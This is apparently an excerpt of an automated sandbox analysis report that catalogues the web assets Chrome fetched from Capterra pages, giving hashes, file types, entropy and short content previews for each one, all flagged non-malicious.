                                                                                                                                                                                                        SHA-512:BAF38EBA134E7631518FD36F01871D5DBB1799A57F74A3E5D0AA85E82D8F168C3CBA12F77A0C6E6A8A00DFC041FC39156CD55A7322C7379CCAA9F38215BE51ED
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/6310-a55b4917884e40ce.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6310],{70947:function(e,t,r){r.d(t,{Z:function(){return k}});var n,o=r(2784),i=r(2550),l=r(16734),a=function(){},c=o.createContext({isOpen:!1,isGapless:!1,show:a,hide:a,triggerRef:null,align:"left"}),u=r(90051),s=["children","className","selected","disabled"];function f(){return(f=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}var p=o.forwardRef(function(e,t){var r=e.children,n=e.className,a=e.selected,c=e.disabled,u=function(e,t){if(null==e)return{};var r,n,o=function(e,t){if(null==e)return{};var r,n,o={},i=Object.keys(e);for(n=0;n<i.length;n++)r=i[n],t.indexOf(r)>=0||(o[r]=e[r]);return o}(e,t);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);for(n=0;n<i.length;n++)r=i[n],!(t.indexOf(r)>=0)&&Object.prototype.propertyIsEnumerable.call(e,r)&
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (611)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):27150
                                                                                                                                                                                                        Entropy (8bit):4.357340680151037
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:6bamwIluB0sJQqCeSQup5szCUXAG0VVi82OgoKACZQQofNJXY3gW3:603Mp5If8WOmgW3
                                                                                                                                                                                                        MD5:46DD133EE00DC1BAE5E4EEBA7B88432F
                                                                                                                                                                                                        SHA1:8AF86A4AC91CE48C062216FB94A6E1D57618A19B
                                                                                                                                                                                                        SHA-256:9EB52EE46C7AB5EA4CA0982415DA99FDED1B7D7354F75E50847BDAE6CB44EB66
                                                                                                                                                                                                        SHA-512:CB49F9E3812E2C262AF374E79BD8905CB508A45BF2C2D6AF62EED85AF43770872486A55E9425882FEDA9FB3A57A317A3C18BE1E286ADAF0C76BE7F1B0DFA8474
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/favicon.ico
                                                                                                                                                                                                        Preview:<!DOCTYPE html>.<html lang="en">. <head>. <meta charset="UTF-8" />. <meta name="viewport" content="width=device-width, initial-scale=1.0" />. <link rel="icon" href="https://www.cloudflare.com/favicon.ico" />. <title>Not Found</title>. <style>. body {. font-family: system-ui;. font-weight: 300;. font-size: 1.25rem;. color: #36393a;. display: flex;. align-items: center;. justify-content: center;. }. main {. max-width: 1200px;. margin-top: 120px;. display: flex;. flex-wrap: wrap;. align-items: center;. justify-content: center;. }. #text {. max-width: 60%;. margin-left: 1rem;. margin-right: 1rem;. }. main > section > div {. margin-bottom: 3.25rem;. }. svg {. margin-left: 2rem;. }. @keyframes eye-1 {. 0% {. transform: translateX(0);. }. 10%,. 50% {. tr
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3391
                                                                                                                                                                                                        Entropy (8bit):4.526418045434012
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:CMbwSiHc5Ym3uJBGYgtBvemWHNsIfU1/UxOGb1ONVPu:DbwSN6JBngtRe7H68U1/OOGpOHPu
                                                                                                                                                                                                        MD5:9F227C0B51933181E4C482E2BD9ED76B
                                                                                                                                                                                                        SHA1:887F1ABB9CDB399315D169AB6BF2859D5166293D
                                                                                                                                                                                                        SHA-256:E0A1D6E38C08B37A2218C4D2E049498940A2A1E50F357F3DF14F7DA46685BEFA
                                                                                                                                                                                                        SHA-512:AA1DF41EC28ADE366E2F02614D19CAF4F26C35EB2EDD25B5D06AE63ED9881CC098F346098B8CAF52385846CB50C2E8930D3067D09E421796F824808FB4F821DF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/trustedby.svg
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="298px" height="120px" viewBox="0 0 298 120" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. Generator: Sketch 61 (89581) - https://sketch.com -->. <title>EBay_logo</title>. <desc>Created with Sketch.</desc>. <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">. <g id="EBay_logo" fill="#444444" fill-rule="nonzero">. <path d="M38.5452377,26.0909534 C17.5742668,26.0909534 0.0991705488,34.9878922 0.0991705488,61.8295507 C0.0991705488,83.0940536 11.8499078,96.48516 39.0867312,96.48516 C71.1457478,96.48516 73.2008469,75.3668975 73.2008469,75.3668975 L57.6667408,75.3668975 C57.6667408,75.3668975 54.3360982,86.7382701 38.139117,86.7382701 C24.9471183,86.7382701 15.4589157,77.8266883 15.4589157,65.3358099 L74.8253286,65.3358099 L74.8253286,57.4975993 C74.8253286,45.1401937 66.9806311,26.0909534 38.5452377,26.0909534 L38.5452377,26.0909534
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):2864
                                                                                                                                                                                                        Entropy (8bit):3.93087721569185
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:UhLLHc686gk/xH481FA/WcrqIAdc4SRdTFr5:UG6m+cdRpX
                                                                                                                                                                                                        MD5:5143AFE4271E84EE4381142E500BE867
                                                                                                                                                                                                        SHA1:D30A5D3A107188BC40F247FD316D975AE03FFD7E
                                                                                                                                                                                                        SHA-256:F8229AF6912F6F45E3BD2426E18986578083C61C9586D7CC6ED029DB3AE02E27
                                                                                                                                                                                                        SHA-512:D55E75CF360505ACCB3FA4750BAD1D739996A64F87796167F1E92B11985CB732EB996661CECFECB70D6B0AF5D05F4E4490545F105F0752D7AFB548D6686A1AF8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/sa-static-assets/setDriftTrackingData.js
                                                                                                                                                                                                        Preview:var drift_tracking = (function() {.. return {.. setUserAttributes: setUserAttributes = (sessionData) => {.. drift.on('ready', function() {.. drift.api.setUserAttributes({.. account_id: sessionData.account,.. adgroup_id: sessionData.adgroup,.. bg_querystring: sessionData.bg_querystring,.. campaign_id: sessionData.campaign_id,.. conversion_page_h1: sessionData.conversion_page_h1,.. conversion_page_url: sessionData.conversion_page_url,.. country_code: sessionData.country_code,.. dclid: sessionData.dclid,.. ga_ad: sessionData.ga_ad,.. ga_adposition: sessionData.ga_adposition,.. ga_campaign: sessionData.ga_campaign,.. ga_client_id: sessionData.ga_client_id,.. ga_content: sessionData.ga_content,..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (30828)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):31235
                                                                                                                                                                                                        Entropy (8bit):5.251714059543231
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:puAlXTTsfSKsMoqSeUDbn4zSfZcwEb6rk27DX8:HlX3sfSHdfyw/r0
                                                                                                                                                                                                        MD5:B2DCC20E7FC37F3902ACC3EB78B125B1
                                                                                                                                                                                                        SHA1:FE92D3BF2ED2E0D7665F6689BE12E290F8A9DF1A
                                                                                                                                                                                                        SHA-256:681F2A7C36718C8FE70259ED53E869E46626A14720814CDB576BA0210B3677D1
                                                                                                                                                                                                        SHA-512:AC36F36B9C9AB2BD9DB9D955F1737C83F25D3E7EF0DFE5D7E5D2C264A48CE316E6DA1FAC9C152F364F7FF4CAA848F1E2657C5E096329D86CAD6FBB18C8CEE892
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:;window.NREUM||(NREUM={});NREUM.init={distributed_tracing:{enabled:true},privacy:{cookies_enabled:true},ajax:{deny_list:["bam-cell.nr-data.net"]}};.window.NREUM||(NREUM={}),__nr_require=function(t,e,n){function r(n){if(!e[n]){var o=e[n]={exports:{}};t[n][0].call(o.exports,function(e){var o=t[n][1][e];return r(o||e)},o,o.exports)}return e[n].exports}if("function"==typeof __nr_require)return __nr_require;for(var o=0;o<n.length;o++)r(n[o]);return r}({1:[function(t,e,n){function r(t){try{s.console&&console.log(t)}catch(e){}}var o,i=t("ee"),a=t(32),s={};try{o=localStorage.getItem("__nr_flags").split(","),console&&"function"==typeof console.log&&(s.console=!0,o.indexOf("dev")!==-1&&(s.dev=!0),o.indexOf("nr_dev")!==-1&&(s.nrDev=!0))}catch(c){}s.nrDev&&i.on("internal-error",function(t){r(t.stack)}),s.dev&&i.on("fn-err",function(t,e,n){r(n.stack)}),s.dev&&(r("NR AGENT IN DEVELOPMENT MODE"),r("flags: "+a(s,function(t,e){return t}).join(", ")))},{}],2:[function(t,e,n){function r(t,e,n,r,s){try{l?
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (7215), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7215
                                                                                                                                                                                                        Entropy (8bit):5.715038918631035
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:XFP79r8FRHF6U/Atg28bngH1nlm6AVPhJ98evibOEOxWShjulmu/TuVH5coKW8A0:p7VfnzeuN/Tk4
                                                                                                                                                                                                        MD5:1C6A1D59A85DC5CC5C7E07197599E9CE
                                                                                                                                                                                                        SHA1:C0E9404A317D60811E5190607D9F74073B9F9CC6
                                                                                                                                                                                                        SHA-256:DBEBA2B031E84A4C7100F7E8F2FE7284C9D296FA1BD2861889F86DF1D708B7B1
                                                                                                                                                                                                        SHA-512:84FBDD8171E910EFA566A3750DA726206EE3BA1AD4BD3F7BD8EF0A6AB52FA86A994D6EE94209F787E88EB6219C1FBE3B7E806E785E8D944525A06BB44D74CBA3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[5],{"/7QA":function(t,i,E){"use strict";E.r(i),"production"!==E("LeJ0").a.ENV&&E("Cp41");var A=E("9EWH"),_=E("ADGC");Object(_.b)()&&Object(A.b)();!function polyfillKickoff(t){try{[1].includes(1)&&t()}catch(i){Promise.all([E.e(49).then(E.t.bind(null,"imET",7)),Promise.all([E.e(2),E.e(40)]).then(E.t.bind(null,"H+SE",7)),E.e(15).then(E.t.bind(null,"2GZm",7)),Promise.all([E.e(2),E.e(12),E.e(7)]).then(E.t.bind(null,"LSZE",7)),E.e(54).then(E.t.bind(null,"3yYM",7))]).then(function(){t()}).catch(function(t){return console.error("Error importing polyfills",t)})}}(function kickOff(){Promise.all([E.e(52),E.e(37),E.e(22),E.e(19),E.e(43),E.e(20),E.e(26),E.e(14),E.e(11),E.e(18),E.e(50),E.e(42),E.e(29),E.e(21),E.e(8),E.e(16),E.e(24),E.e(17)]).then(E.bind(null,"V+70")).catch(function(t){return console.warn("loading root widget failed",t)})})},0:function(t,i,E){t.exports=E("/7QA")},"91+0":function(t){t.exports={"//WS_CHAT_BASE":"localhost:4000",ENV:"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (563)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5091
                                                                                                                                                                                                        Entropy (8bit):5.011006748531497
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+zpHg/ci55bnkpDJyfnWeQUjqsTiAb0MgVnEHOJgluUc7yhUe9PqGpdxEiJTB:+zNg/PvNnWJVLAb0MgVnEHOJAuUvie1n
                                                                                                                                                                                                        MD5:3A8CB3262D3B304CC120A77AE783000B
                                                                                                                                                                                                        SHA1:9BB322A260422724F16035C10FF110BE4890FBF1
                                                                                                                                                                                                        SHA-256:E3DF8AE242043E0C9A6883C684D24C8BC5199B1330D1E371D2296D54F59E4AE9
                                                                                                                                                                                                        SHA-512:BC34B83D2FD90407C90AC1C9BDC312B3D0D1D4A8AA8AD3A906C8AB299F60AE331C91B1B51EE1D4F5D70A95C6082A1E1CFA4BBC06B6B4DED8697D0D39C0888698
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://forms-as-a-service.capterra.com/faas-modal-payload.js?formId=7DbjmVSFi4BGlfm43ATGbM
                                                                                                                                                                                                        Preview:(function () {. function fixScriptTagsNotExecuting(node) {. if (node.tagName === "SCRIPT") {. node.parentNode.replaceChild(cloneScriptNode(node), node);. } else {. var i = -1,. children = node.childNodes;. while (++i < children.length) {. fixScriptTagsNotExecuting(children[i]);. }. }. return node;.}..function cloneScriptNode(node) {. var script = document.createElement("script");. script.text = node.innerHTML;.. var i = -1,. attrs = node.attributes,. attr;. while (++i < attrs.length) {. script.setAttribute((attr = attrs[i]).name, attr.value);. }. return script;.}.. var state={"modalDisplayFrequency":"Once per user, ever","formId":"7DbjmVSFi4BGlfm43ATGbM","baseUrl":"https://forms-as-a-service.capterra.com","isTest":false,"BETA_BASE_URL":"https://forms-as-a-service.capstage.net","BETA_RATE":0,"modalRestrictedUrls":["/sem/","/sem-compare/","raas.capterra.com","review.capterra.com","reviews.capterra.com","insights.capterra.com","capterra.com/works
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (10559), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):10559
                                                                                                                                                                                                        Entropy (8bit):5.205836284897392
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Hr15CKrIJCG4rsCN1CdSVrp8CYZxNJCyr9ECHmv+0CqJzCichCTfOW5Q:84oC7CMKZBCv+0CychCs
                                                                                                                                                                                                        MD5:A8EF35D495116E7F38E2B38A8DF36F58
                                                                                                                                                                                                        SHA1:19B353EED618F2F104CABDB45E5814236BF369DD
                                                                                                                                                                                                        SHA-256:74098E06C3841CF93E2DCF0F0FBBCD2FA7DD727E531B28CA253B69076066E862
                                                                                                                                                                                                        SHA-512:F6A91A1DAE37B364A713D30074701311C73C783E9303B1CA77020E4696D5A5DA8A76E4EF2149418E9F40F9FB35895DF85F1FBB21EB3A9D205DF26282E0D190C5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[779],{78283:function(r,t,e){e.d(t,{Z:function(){return v}});var n=e(2784),o=e(2550),i=e(16734);function a(r){return(a="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(r){return typeof r}:function(r){return r&&"function"==typeof Symbol&&r.constructor===Symbol&&r!==Symbol.prototype?"symbol":typeof r})(r)}var c=["gapless","align","className","children"];function l(){return(l=Object.assign?Object.assign.bind():function(r){for(var t=1;t<arguments.length;t++){var e=arguments[t];for(var n in e)Object.prototype.hasOwnProperty.call(e,n)&&(r[n]=e[n])}return r}).apply(this,arguments)}var u=e(25632);function f(r){return(f="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(r){return typeof r}:function(r){return r&&"function"==typeof Symbol&&r.constructor===Symbol&&r!==Symbol.prototype?"symbol":typeof r})(r)}var s=["variant","className","children"];function b(){return(b=Object.assign?Object.as
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):6919
                                                                                                                                                                                                        Entropy (8bit):7.961496487601083
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Qv0wKbxrJSjsUzYAzjvClToAJFyNiPAPmknTzNynizZweKsuJmYm8yeH9i:QvLkxrprKvFAj1kvnTBcF0uo5BEi
                                                                                                                                                                                                        MD5:260B9543013F78A820A431656C49A5F3
                                                                                                                                                                                                        SHA1:03B6943DFA73A5D742E914ABA27413C2DF2296E1
                                                                                                                                                                                                        SHA-256:EC0EEEAE02DCEBE6D5118AD7E3F3BDD8CFDD6C28F9104A69422C85F3E1E77D0F
                                                                                                                                                                                                        SHA-512:8AED89B8C557CE758DE06B4501D88BADB671E7EAD51FC7C9CD1732306598AD05ACE0DB826A52318FB62EF84C44ED4D4D3777F7D0E3D20B68A9C67E8C6111A5C3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.....9d6.....sRGB.........IDATx^..xTU.......B..e.$.(J.aA\..W........".+..~...~..b.+..]...,..T.H[.R.BBz...=.....>%!..y&..;3.......=.9W.....h..DhM..%*...R....]/..{.#..J.(.....&"p+'"p+'"p+'"p+'"p+'"p+'"p+'"p+'t..j.Fh.d.2$.*t.M...1*..*.._.HV......n.-.B...f...M.6Z..........,...V..;...N.YW..B7.X...V.....bB.ZG.:d.}.......9n.Gs.<\..V....g.L...r..D..?....L.C'.D.S.eG.L.w!.UZ.^...Z....k.L..Q.e5a...D...|Q.f..'?yu..c......V..cT.R.d5.3..e.d.%.~vz.[...d.e..%U.+.pE0.p~..)Q*...rE\x..X"...l..;..5.\Ae...,.>J5\x..Dt..P.%...."...q.....\..]..V.K.U.E...bB..."4.....\.e.a.+\Z..\....06Fe.]....#....,....x.....=../rU.....Y09....f2.&b+.p..j.4....n..,p2A....TC9._.p.E.h.3cTRT.".N..Q.......S.vE..C."......VA....._.x.=..W5...Bu.>.$......VF~."...#..gQ...Tj.Y.o.^......v..,........e(.P...~....fU87ZeP.j......y.qh..tJ4.2M.X.)..........Q.}..FR..\t...E..T;}..Z.F7.cN3..[...~[~....O.:....2..Lw..^..$.G.q.P.I.t.4.R.N..U.d..;..9....`..s..O..#*..G'....e...w...G.dk.(..9P
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (9650), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):9650
                                                                                                                                                                                                        Entropy (8bit):5.461928917834568
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:Z5Aa4vBQIaYL5tgGrAz1ssMufHpVqE9g9:cVeKtXrAz1ssMufJVqE9q
                                                                                                                                                                                                        MD5:F59F92A8B9BCC9E522ED883D6EDFA94E
                                                                                                                                                                                                        SHA1:80E72F5D94040279428D070F6BAB3B669C231EC3
                                                                                                                                                                                                        SHA-256:C8D500CFEC3F3DEDA70D57AE112D4616F76C2897951717750E7E1F47F2C97287
                                                                                                                                                                                                        SHA-512:63F1D0DE69C820C8AFC02B383D92231AE0C4A55BEE2D164F77BD42A303A7BC92F9AD47CB17A1671F5BBD2378A7361F43DAFA209164B077AE3A969CEA5AEB6DCA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8115],{80978:function(t,e,n){n.d(e,{h:function(){return r.hU}});var r=n(20857)},37213:function(t,e){e.Z=t=>{void 0===window.dataLayer?console.warn("window.dataLayer is undefined"):window.dataLayer.push(t)}},11684:function(t,e,n){var r=n(37213);let o=(t,e)=>{let n={};return Object.keys(t).forEach(e=>{n[e]=t[e]}),n.ProductCategoryName=e,n},a=()=>{let t=window.document.querySelector('meta[name="productCategory"]');return t instanceof HTMLMetaElement&&null!=t?"".concat(t.content," Software"):null},i=(t,e)=>{let n={event:"dirpaClick",customDimensions:{},category:t.category,action:t.action};if(e){var r,i;null===(i=window)||void 0===i||null===(r=i.ga)||void 0===r||r.call(i,"send","pageview",e)}return Object.keys(t).forEach(e=>{t[e]&&(t[e].length>0||Object.keys(t[e]).length>0)&&("customDimensions"===e?n.customDimensions=o(t[e],a()):n[e]=t[e])}),n};e.Z=t=>{let{data:e,path:n}=t,o=i(e,n);(0,r.Z)(o)}},32946:function(t,e,n){n.d(e
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3746
                                                                                                                                                                                                        Entropy (8bit):4.669796676554552
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:E+fNruqwqdK6/ERl/modd01rZHFIk5/iMGbv:1NvrK47Kd0HltVM
                                                                                                                                                                                                        MD5:7E8ACE7A1BD895131C0E9549808516BA
                                                                                                                                                                                                        SHA1:429DFF336A9D19F0D81E579712556FC3600539F0
                                                                                                                                                                                                        SHA-256:386D398E46631D8291C9D7D2142CE0C6186A251B5E6E52F6A78338D9A22050E2
                                                                                                                                                                                                        SHA-512:2650FCD3BD5A66B3F81D78E71963ED197E111040DBBABBDB2D6FF1255981CCE1D6F5BB0450066BEB36A2D79478F93E56DE1A11461DC487F8DCCECBBCD5DFC9F2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. Generator: Adobe Illustrator 18.1.1, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->..<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"... viewBox="0 38.3 100 23.3" enable-background="new 0 38.3 100 23.3" xml:space="preserve">..<g id="publicate_1_" enable-background="new ">...<g id="publicate">....<g>.....<path fill="#FFFFFF" d="M32.2,46.3c-1,0-1.8,0.4-2.5,1.1v-0.9h-2.3v11.4h2.3v-4.1c0.6,0.8,1.5,1.2,2.4,1.2c1,0,1.9-0.4,2.7-1.3......c0.8-0.8,1.1-1.9,1.1-3.1c0-1.2-0.4-2.2-1.1-3.1C34,46.7,33.1,46.3,32.2,46.3z M32.9,52.3c-0.4,0.4-0.9,0.6-1.4,0.6......s-1-0.2-1.4-0.6c-0.4-0.4-0.6-1-0.6-1.7c0-0.7,0.2-1.3,0.6-1.7c0.4-0.5,0.8-0.7,1.4-0.7c0.6,0,1,0.2,1.4,0.7s0.6,1,0.6,1.7......C33.5,51.3,33.4,51.8,32.9,52.3z M43,50.9c0,0.6-0.2,1.1-0.5,1.5c-0.3,0.3-0.7,0.5-1.2,0.5c-0.9,0-1.4-0.6-1.4-1.9v-4.6h-2.3v5.1......c0,1.1,0.3,2,0.9,2.6c0.6,0.6,1.4,0.9,2.3,0.9c0.9,0,1.7-0.4,2.2-1
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12869), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):12869
                                                                                                                                                                                                        Entropy (8bit):5.387027259622779
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:4IBuCFR08LT0xD3GPBps+a/fCFB3e9zELSnsLTCn1Hej:4MuD3GKQBGISR1HE
                                                                                                                                                                                                        MD5:F507C73097318EC0979B0E8E2400C148
                                                                                                                                                                                                        SHA1:86FAC2188E6EC79D54C44614BB10878FE8E135F6
                                                                                                                                                                                                        SHA-256:2B3BF75D275512A36620DB1375D97B93711914DE8F916FB478F8D331A07B4974
                                                                                                                                                                                                        SHA-512:1D92B2DFD7FA5C7D809D49E1D8E7B1DC55EA8ADF585D894D5454578712A497C968B83CBAE0B9F98F7A07A5D4CD8587B537BF542E70D41E055266E3DB8AC6DD37
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5297],{64993:function(e,t,n){n.d(t,{e:function(){return _},default:function(){return j}});var l=n(27573),i=n(14823),a=n(62780),r=n(34617),o=n(4854),s=n(22222),d=n(81731),c=n(48543),u=n(10741),m=n(78713),v=n(80978),g=e=>{let{product:t}=e,{deviceType:n}=(0,v.h)(),i="These products are similar to ".concat(t.name," in terms of categories, features, and verified user reviews. We have prioritized alternative products from vendors who pay for traffic from our site - orange buttons will take you to these vendor sites.");return(0,l.jsxs)("div",{className:"whitespace-no-wrap md:mb-3xl mb-xl text-center","data-testid":"h2h-heading-disclaimer-container",children:[(0,l.jsxs)("h2",{className:"pr-2xs text-neutral-99 inline whitespace-normal text-lg font-semibold md:text-xl","data-testid":"h2h-heading-disclaimer-title",children:["Other great alternatives to ",null==t?void 0:t.name]}),(0,l.jsx)("div",{"data-testid":"h2h-heading-discl
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                        MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                        SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                        SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                        SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4874
                                                                                                                                                                                                        Entropy (8bit):7.2866116182296805
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jMc5N26MT0D5MdtbZPAVwzVHlk71yCyUitTWU7p6:+04coYNMtKw/hCyU47E
                                                                                                                                                                                                        MD5:CE933A8EE9CB34C3F53D28861BAA8EF7
                                                                                                                                                                                                        SHA1:9E1388F1ECDA9B73DB528011E9D3526DADD01D7D
                                                                                                                                                                                                        SHA-256:414848C1DF99D1816C7265AE9836A8C5C47DF1727D6E22E26FD39EC7BFD6603E
                                                                                                                                                                                                        SHA-512:0E74A61053CD632ED8D9FF7D2E9E94476BCA49D6113C47D4E833645672201013C03F0DD0873F0BAED5C3154D70052B86204E941B041819EF0292EA9C32BAC6F1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/f11ea590-5812-4ce0-a108-3837d065513d.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B...Gmeta.......(hdlr........pict............libavif.....pitm..........iloc....D............o.......(iinf..........infe........av01Color.....iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour spa
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6157), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):6157
                                                                                                                                                                                                        Entropy (8bit):5.497077613817224
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:R7r5VXKO+Ds32uk6REyB3i76eVrsMVWfO72/+JSnH7TEEGlqNxRxdEjvc0B:RhhKO+DsGORxefcz+JAbTEEfJEL3B
                                                                                                                                                                                                        MD5:3F65873B888D908CA56021DF8A28D02E
                                                                                                                                                                                                        SHA1:1712BA4F7F8440679741F09760CB738BD610B41B
